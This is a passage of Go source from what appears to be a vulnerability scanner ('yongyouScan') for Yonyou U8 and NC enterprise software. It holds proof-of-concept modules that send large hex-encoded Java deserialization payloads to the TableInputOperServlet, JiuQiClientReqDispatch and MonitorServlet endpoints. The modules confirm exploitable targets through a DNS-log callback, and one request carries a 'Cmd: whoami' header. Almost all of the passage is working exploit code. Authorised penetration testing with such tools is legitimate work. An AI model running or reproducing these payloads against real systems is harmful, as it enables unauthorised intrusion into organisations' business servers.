E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
28 | 	if err != nil {
29 | 		color.Red.Println("[-] 用友 U8 TableInputOperServlet反序列化漏洞不存在")
30 | 		return
31 | 	}
32 | 	if dnslog.GetDnslogRecord(session) {
33 | 		color.Green.Println("[+] 用友 U8 TableInputOperServlet反序列化漏洞存在 -> " + url)
34 | 		return
35 | 	}
36 | 	color.Red.Println("[-] 用友 U8 TableInputOperServlet反序列化漏洞不存在")
37 | }
38 | 


--------------------------------------------------------------------------------
/pkg/POC/NC-JiuQiClientReqDispatch/NC-JiuQiClientReqDispatch.go:
--------------------------------------------------------------------------------
 1 | package NC_JiuQiClientReqDispatch
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | //https://blog.csdn.net/qq_41904294/article/details/134818872?spm=1001.2014.3001.5502
19 | 
20 | func Run(url string) {
21 | 	domain, session := dnslog.GetDnslogUrl()
22 | 	url = url + "/servlet/~ic/com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch"
23 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
24 | 		"User-Agent":     UA,
25 | 		"Cmd":            "whoami",
26 | 		"Content-Length": "20434",
27 | 		"Content-Type":   "application/x-www-form-urlencoded",
28 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url)
29 | 	if err != nil {
30 | 		color.Red.Println("[-] 用友 NC JiuQiClientReqDispatch反序列化漏洞不存在")
31 | 		return
32 | 	}
33 | 	if dnslog.GetDnslogRecord(session) {
34 | 		color.Green.Println("[+] 用友 NC JiuQiClientReqDispatch反序列化漏洞存在 -> " + url)
35 | 		return
36 | 	}
37 | 	color.Red.Println("[-] 用友 NC JiuQiClientReqDispatch反序列化漏洞不存在")
38 | }
39 | 


--------------------------------------------------------------------------------
/pkg/POC/monitorservlet-Desera/monitorservlet-Desera.go:
--------------------------------------------------------------------------------
 1 | package monitorservlet_Desera
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"time"
 9 | 	"yongyouScan/pkg/dnslog"
10 | 	"yongyouScan/pkg/utils"
11 | )
12 | 
13 | var (
14 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
15 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
16 | )
17 | 
18 | func Run(url string) {
19 | 	domain, session := dnslog.GetDnslogUrl()
20 | 	url1 := url + "service/monitorservlet"
21 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
22 | 		"User-Agent":     UA,
23 | 		"Content-Length": "20434",
24 | 		"Content-Type":   "application/x-www-form-urlencoded",
25 | 	}).Post(url1)
26 | 	if err != nil {
27 | 	} else {
28 | 		if resp.Status == "200 OK" {
29 | 			color.Green.Println("[+] 用友 NC MonitorServlet反序列化漏洞存在 -> " + url)
30 | 			return
31 | 		}
32 | 	}
33 | 	url2 := url + "servlet/~ic/nc.bs.framework.mx.monitor.MonitorServlet"
34 | 	_, err1 := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
35 | 		"User-Agent": UA,
36 | 	}).SetBody(fmt.Sprintf("{{unquote(\"%s\")}}", utils.InsertBackslashX(fmt.Sprintf("ACED0005737200146A6176612E7574696C2E4C696E6B65644C6973740C29535D4A6088220300007870770400000016737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C770800000010000000017372000C6A6176612E6E65742E55524C962537361AFCE47203000749000868617368436F6465490004706F72744C0009617574686F726974797400124C6A6176612F6C616E672F537472696E673B4C000466696C6571007E00054C0004686F737471007E00054C000870726F746F636F6C71007E00054C000372656671007E00057870FFFFFFFFFFFFFFFF740014636333316F723332312E%s74000071007E00077400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063633332322E%s71007E000871007E000E740004687474707078767200336F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E457874656E64656450726F70657274696573243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334302E%s71007E000871007E00147400046874747070787672003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E66756E63746F72732E436861696E65645472616E73666F726D657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636334312E%s71007E000871007E001A7400046874747070787672002E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73342E466C75656E744974657261626C6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F636231372E%s71007E000871007E0020740004687474707078767200376F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4D617070656450726F706572747944657363726970746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623138782E%s71007E000871007E00267400046874747070787672003A6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E44796E614265616E4D61704465636F7261746F72244D6170456E74727900000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001063623139782E%s71007E000871007E002C740004687474707078767200326F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E496E74726F7370656374696F6E4461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303932782E%s71007E000871007E003274000468747470707876720031636F6D2E6D6368616E67652E76322E633370302E696D706C2E506F6F6C4261636B656444617461536F757263654261736500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012633370303935782E%s71007E000871007E00387400046874747070787672002D636F6D2E6D6368616E67652E76322E633370302E746573742E416C776179734661696C44617461536F7572636500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000E616A772E%s71007E000871007E003E7400046874747070787672002A6F72672E6173706563746A2E7765617665722E746F6F6C732E63616368652E53696D706C65436163686500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062342E%s71007E000871007E0044740004687474707078767200176273682E436F6C6C656374696F6E4D616E61676572243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062352E%s71007E000871007E004A7400046874747070787672001A6273682E656E67696E652E427368536372697074456E67696E6500000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF740012627368323062362E%s71007E000871007E0050740004687474707078767200236273682E636F6C6C656374696F6E2E436F6C6C656374696F6E4974657261746F72243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001867726F6F7679313730323331312E%s71007E000871007E0056740004687474707078767200356F72672E636F6465686175732E67726F6F76792E7265666C656374696F6E2E436C617373496E666F24436C617373496E666F53657400000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234782E%s71007E000871007E005C7400046874747070787672001267726F6F76792E6C616E672E5475706C653200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001467726F6F76793234342E%s71007E000871007E0062740004687474707078767200246F72672E636F6465686175732E67726F6F76792E72756E74696D652E64676D243131373000000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74000F6265636C2E%s71007E000871007E006874000468747470707876720031636F6D2E73756E2E6F72672E6170616368652E6263656C2E696E7465726E616C2E7574696C2E436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A646B377532312E%s71007E000871007E006E7400046874747070787672002C636F6D2E73756E2E636F7262612E73652E696D706C2E6F72627574696C2E4F5242436C6173734C6F6164657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400124A5245387532302E%s71007E000871007E0074740004687474707078767200426A617661782E7377696E672E706C61662E6D6574616C2E4D6574616C46696C6543686F6F7365725549244469726563746F7279436F6D626F426F784D6F64656C243100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400106C696E75782E%s71007E000871007E007A7400046874747070787672002173756E2E6177742E5831312E4177744772617068696373436F6E6669674461746100000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF74001277696E646F77732E%s71007E000871007E00807400046874747070787672001B73756E2E6177742E77696E646F77732E57427574746F6E5065657200000000000000000000007870787371007E00023F4000000000000C770800000010000000017371007E0004FFFFFFFFFFFFFFFF7400166A61636B736F6E323130302E%s71007E000871007E00867400046874747070787672002C636F6D2E666173746572786D6C2E6A61636B736F6E2E6461746162696E642E6E6F64652E504F4A4F4E6F6465000000000000000000000078707878", hex.EncodeToString([]byte(domain)))))).Post(url2)
37 | 	if err1 != nil {
38 | 		color.Red.Println("[-] 用友 NC MonitorServlet反序列化漏洞不存在")
39 | 		return
40 | 	}
41 | 	if dnslog.GetDnslogRecord(session) {
42 | 		color.Green.Println("[+] 用友 NC MonitorServlet反序列化漏洞存在 -> " + url)
43 | 		return
44 | 	}
45 | 	color.Red.Println("[-] 用友 NC MonitorServlet反序列化漏洞不存在")
46 | }
47 | 


--------------------------------------------------------------------------------